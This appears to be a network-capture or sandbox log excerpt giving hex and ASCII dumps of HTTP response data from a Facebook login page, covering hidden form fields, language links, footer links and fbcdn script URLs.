                                                                                                                2022-10-13 11:08:02 UTC3796INData Raw: 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 68 61 64 5f 63 70 5f 70 72 65 66 69 6c 6c 65 64 22 20 6e 61 6d 65 3d 22 68 61 64 5f 63 70 5f 70 72 65 66 69 6c 6c 65 64 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 68 61 64 5f 70 61 73 73 77 6f 72 64 5f 70 72 65 66 69 6c 6c
                                                                                                                Data Ascii: put type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefill
                                                                                                                2022-10-13 11:08:02 UTC3798INData Raw: 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 64 65 5f 44 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c
                                                                                                                Data Ascii: n.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\
                                                                                                                2022-10-13 11:08:02 UTC3799INData Raw: 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b
                                                                                                                Data Ascii: <li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;
                                                                                                                2022-10-13 11:08:02 UTC3801INData Raw: 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65
                                                                                                                Data Ascii: ww_list_selector&quot;, 5); return false;" title="Spanish">Espaol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require
                                                                                                                2022-10-13 11:08:02 UTC3802INData Raw: 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 38 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 48 69 6e 64 69 22 3e e0 a4 b9 e0 a4 bf e0 a4 a8 e0 a5 8d e0 a4 a6 e0 a5 80 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25
                                                                                                                Data Ascii: 2Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"></a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%
                                                                                                                2022-10-13 11:08:02 UTC3804INData Raw: 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 61 74 63 68 2f 22 20 74 69 74 6c 65 3d 22 42 72 6f 77 73 65 20 6f 75 72 20 57 61 74 63 68 20 76 69 64 65 6f 73 2e 22 3e 57 61 74 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6c 61 63 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 70 6f 70 75 6c 61 72 20 70 6c 61 63 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 6c 61 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61
                                                                                                                Data Ascii: for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Fa
                                                                                                                2022-10-13 11:08:02 UTC3805INData Raw: 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 72 6f 75 70 73 2f 65 78 70 6c 6f 72 65 2f 22 20 74 69 74 6c 65 3d 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 47 72 6f 75 70 73 2e 22 3e 47 72 6f 75 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 6f 75 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 61 63 63 65 73 73 6b 65 79 3d 22 38 22 20 74 69 74 6c 65 3d 22 52 65 61 64 20 6f 75 72 20 62 6c 6f 67 2c 20 64 69 73 63 6f 76 65 72 20 74 68 65 20 72 65 73 6f 75 72 63 65 20 63 65 6e 74 65 72 2c 20 61 6e 64 20 66 69 6e 64 20
                                                                                                                Data Ascii: e Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find
                                                                                                                2022-10-13 11:08:02 UTC3806INData Raw: 36 65 66 30 0d 0a 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65
                                                                                                                Data Ascii: 6ef0areers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookie
                                                                                                                2022-10-13 11:08:02 UTC3807INData Raw: 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 6b 49 45 22 7d 2c 22 35 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 6c 5f 34 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 35 55 55 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70
                                                                                                                Data Ascii: b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736ukIE"},"588":{"result":true,"hash":"AT7B-2KeH1gOOVfLl_4"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOA5UU"},"1908135":{"result":false,"hash":"AT6miGyp
                                                                                                                2022-10-13 11:08:02 UTC3809INData Raw: 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 6e 6b 51 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 76 36 4d 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 38 39 31 22 3a 7b 22 72 22 3a 31 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 38 32 31 39 34 7d
                                                                                                                Data Ascii: rue,"hash":"AT70V-Q_zfEykznOnkQ"},"1099893":{"result":false,"hash":"AT5kly2LSZV_DKGRv6M"}},"qexData":{"644":{"r":null},"647":{"r":null}},"qplData":{"891":{"r":1}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006382194}
                                                                                                                2022-10-13 11:08:02 UTC3810INData Raw: 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 47 5c 2f 72 5c 2f 2d 4d 45 4a 79 49 32 56 48 6e 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 47 47 31 59 30 73 59 63 37 4d 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e
                                                                                                                Data Ascii: c":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/r\/-MEJyI2VHno.js?_nc_x=Ij3Wp8lg5Kz"},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yv\/r\/GG1Y0sYc7My.js?_nc_x=Ij3Wp8lg5Kz"},"h3ZzAmG":{"type":"js","src":"https:\/\/static.
                                                                                                                2022-10-13 11:08:02 UTC3812INData Raw: 34 45 79 70 39 6e 51 31 75 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 4c 70 78 52 35 71 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6a 5c 2f 72 5c 2f 42 39 75 4b 43 59 46 57 49 41 34 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 72 5c 2f 62 32 6c 64 33 76 2d 35 52 50 54 2e 6a 73 3f 5f 6e 63 5f 78 3d
                                                                                                                Data Ascii: 4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz"},"LpxR5qU":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yj\/r\/B9uKCYFWIA4.js?_nc_x=Ij3Wp8lg5Kz"},"IaR\/6uP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/r\/b2ld3v-5RPT.js?_nc_x=
                                                                                                                2022-10-13 11:08:02 UTC3813INData Raw: 58 7a 37 36 46 72 58 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4d 5c 2f 72 5c 2f 48 67 2d 30 64 31 59 6f 5a 32 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 55 5c 2f 74 6e 74 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 34 70 34 5c 2f 79 30 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5a 67 45 6f 43 66 43 54 73 72 31 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 72 47 51 6b 37 33 4c 22
                                                                                                                Data Ascii: Xz76FrX":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yM\/r\/Hg-0d1YoZ2w.js?_nc_x=Ij3Wp8lg5Kz"},"xU\/tntj":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ic4p4\/y0\/l\/en_US\/ZgEoCfCTsr1.js?_nc_x=Ij3Wp8lg5Kz"},"rGQk73L"
                                                                                                                2022-10-13 11:08:02 UTC3815INData Raw: 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 61 4f 36 34 5c 2f 79 62 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 71 64 5a 5a 54 45 66 38 63 6d 43 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 70 4d 75 38 48 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 54 51 79 34 5c 2f 79 70 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6b 79 45 41 4e 6b 77 7a 74 74 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 59 79 46 76 78 65 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74
                                                                                                                Data Ascii: xx.fbcdn.net\/rsrc.php\/v3iaO64\/yb\/l\/en_US\/qdZZTEf8cmC.js?_nc_x=Ij3Wp8lg5Kz"},"RpMu8Hd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTQy4\/yp\/l\/en_US\/kyEANkwzttq.js?_nc_x=Ij3Wp8lg5Kz"},"YyFvxed":{"type":"js","src":"https:\/\/stat
                                                                                                                2022-10-13 11:08:02 UTC3816INData Raw: 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 7a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 68 50 54 73 51 50 4b 33 32 38 58 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 4c 70 33 36 59 58 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 51 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 49 62 55 55 58 57 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                                                Data Ascii: x.fbcdn.net\/rsrc.php\/v3\/yz\/l\/0,cross\/hPTsQPK328X.css?_nc_x=Ij3Wp8lg5Kz"},"Lp36YXT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"IbUUXWO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net
                                                                                                                2022-10-13 11:08:02 UTC3818INData Raw: 5c 2f 65 6e 5f 55 53 5c 2f 41 4a 65 53 43 65 73 30 50 75 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 35 56 78 43 64 34 48 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 44 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 49 71
                                                                                                                Data Ascii: \/en_US\/AJeSCes0Puz.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"5VxCd4H":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yD\/l\/0,cross\/Iq
                                                                                                                2022-10-13 11:08:02 UTC3819INData Raw: 55 53 5c 2f 34 58 69 66 56 5f 75 6a 4d 58 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 30 61 37 70 77 2b 35 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6c 30 6c 34 5c 2f 79 4d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 49 53 6d 57 33 46 32 32 6a 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 4e 78 6a 46 2b 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 75 5c 2f 6c 5c 2f
                                                                                                                Data Ascii: US\/4XifV_ujMXV.js?_nc_x=Ij3Wp8lg5Kz"},"0a7pw+5":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3il0l4\/yM\/l\/en_US\/ISmW3F22j1N.js?_nc_x=Ij3Wp8lg5Kz"},"nNxjF+N":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yu\/l\/
                                                                                                                2022-10-13 11:08:02 UTC3821INData Raw: 5c 2f 76 33 69 6f 35 45 34 5c 2f 79 34 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 77 6b 66 2d 73 33 68 30 45 66 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 45 50 37 62 42 46 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 43 54 6e 4b 33 7a 59 44 73 31 5f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70
                                                                                                                Data Ascii: \/v3io5E4\/y4\/l\/en_US\/wkf-s3h0Efb.js?_nc_x=Ij3Wp8lg5Kz"},"eEP7bBF":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/l\/0,cross\/CTnK3zYDs1_.css?_nc_x=Ij3Wp8lg5Kz"},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.p
